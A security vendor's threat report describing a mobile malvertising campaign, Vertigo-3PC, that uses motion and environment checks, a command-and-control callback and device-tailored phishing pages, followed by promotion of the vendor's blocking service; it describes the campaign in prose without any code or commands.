Mobile-specific malvertising campaign targets devices in motion and explodes its reach in four weeks among Demand Side Platforms
Malvertisers have deployed a unique twist on their campaigns that involves multiple checks and redirects to deploy phishing content to unassuming users. Detected and tracked by The Media Trust’s Digital Security Operations team since January, this campaign used dozens of domains to target mobile-web users, tripling its reach in four weeks.
The campaign was isolated to seven—several well-known—Demand Side Platforms and The Media Trust worked quickly to stop its propagation to the broader digital advertising ecosystem. To date, the campaign has not affected our media publisher clients.
How it works
- Mobile device is in motion by checking for changes to its longitude/latitude coordinates, acceleration and gravity
- Creative is in a live environment and not just from a synthetic ad tag scan
For campaign tracking purposes and ensuring the redirect has occurred, the domain sends information regarding the Demand Side Platform, publisher domain and campaign ID to the command and control server and, finally, serves the user a phishing landing page.
In an additional final attempt to appear legitimate and ensure execution on a mobile device, the landing page performs additional checks to determine the ISP, mobile device model, and display the applicable message to the readers. If the reader is on an iPhone, the content served would be related to Apple. While these examples are for Apple devices there’s nothing in the code pattern to indicate that Android devices are safe from this attack. To further remove their tracks, the final action removes the event listening code.
How you can protect your digital advertising ecosystem
Continuous scanning and analysis helped catch Vertigo-3PC due to its sophisticated and multi-stage operation. The Media Trust’s Digital Security and Operations team leveraged one scan’s results to identify additional code signatures and hunt for related malicious campaigns. Once confirmed, the indicators of compromise are automatically added to our blocklist which feeds Media Filter, our malware blocking solution for media publishers.
Vertigo-3PC is another example of how continuous, client-side scanning identifies highly obfuscated malware and quickly refreshes our malware blocking list.